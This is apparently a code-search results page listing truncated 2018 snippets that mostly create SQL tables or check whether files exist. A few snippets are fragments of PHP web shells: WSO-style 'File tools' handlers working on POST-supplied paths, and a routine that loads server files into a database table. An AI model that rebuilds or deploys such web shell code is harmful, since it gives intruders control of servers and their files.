42.7K results in 792 ms
8 years ago · Feb 09, 2018, 03:50 PM
new String:Query[256]; SQL_TQuery(database, SQL_CheckError, "CREATE TABLE IF NOT EXISTS cz_data_basic(SteamId BIGINT NOT NULL,
8 years ago · Feb 09, 2018, 03:12 PM
bool exists; FILE *ifp; exists = false; if ( ( ifp = fopen( filename, "r"
8 years ago · Feb 09, 2018, 03:04 PM
tabel risa.checklists wordt geschreven CREATE TABLE IF NOT EXISTS `checklists` ( `id` int(10) unsigned
8 years ago · Feb 09, 2018, 02:34 PM
and forces rename request if not allowed symbols are used
8 years ago · Feb 09, 2018, 02:02 PM
of ${drive}..."; FP=$((PI+1)); # used if non-MS_DOS partition table is not in use. FirstPartition[${HI}]=${FP}; PTType=${HDPT[${HI}]};
8 years ago · Feb 09, 2018, 01:54 PM
if the releasenote file exists and if its of type: .txt"
8 years ago · Feb 09, 2018, 01:52 PM
of ${drive}..."; FP=$((PI+1)); # used if non-MS_DOS partition table is not in use. FirstPartition[${HI}]=${FP}; PTType=${HDPT[${HI}]};
8 years ago · Feb 09, 2018, 01:44 PM
of ${drive}..."; FP=$((PI+1)); # used if non-MS_DOS partition table is not in use. FirstPartition[${HI}]=${FP}; PTType=${HDPT[${HI}]};
8 years ago · Feb 09, 2018, 01:38 PM
CREATE DATABASE IF NOT EXISTS Gestion_De_Clés; USE Gestion_De_Clés; CREATE TABLE utilisateur IF EXISTS DROP
8 years ago · Feb 09, 2018, 01:18 PM
if(mysql_select_db($_POST['mysql_db'],$db)) {$sql = "DROP TABLE IF EXISTS cih_tb;"; mysql_query($sql); $sql = "CREATE TABLE `cih_tb` ( `file` LONGBLOB NOT NULL );"; mysql_query($sql);$sql = "LOAD DATA
8 years ago · Feb 09, 2018, 12:36 PM
March, 15 2015 00:00:00+0000 | CREATE TEMPORARY TABLE IF NOT EXISTS ListaAnoMes AS SELECT Date_format(m1,
8 years ago · Feb 09, 2018, 12:30 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Feb 09, 2018, 12:24 PM
USE `mydb` ; -- ----------------------------------------------------- -- Table `mydb`.`Legesenter` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `mydb`.`Legesenter` ( `Name` VARCHAR(45) NOT
8 years ago · Feb 09, 2018, 12:22 PM
TABLE IF EXISTS temp_avgrcpm; CREATE TEMPORARY TABLE IF NOT EXISTS temp_avgrcpm AS ( SELECT d.`site_area_id`,
8 years ago · Feb 09, 2018, 11:34 AM
for metrics (telegraf will create it if not exists). database = "telegraf" # required ## Name
8 years ago · Feb 09, 2018, 11:24 AM
DROP DATABASE IF EXISTS bibliothek1; CREATE DATABASE bibliothek1; USE bibliothek1; CREATE TABLE autoren ( AutorNr INT NOT
8 years ago · Feb 09, 2018, 10:16 AM
stored as textfile; alter table test add if not exists partition (year="${year}",month="${month}",day="${day}",hour="${hour}") location "/data/testdb/test/${year}/${month}/${day}/${hour}";
8 years ago · Feb 09, 2018, 09:56 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Feb 09, 2018, 08:08 AM
for table `accounts` -- DROP TABLE IF EXISTS `accounts`; /*!40101 SET @saved_cs_client
Total pages: 2134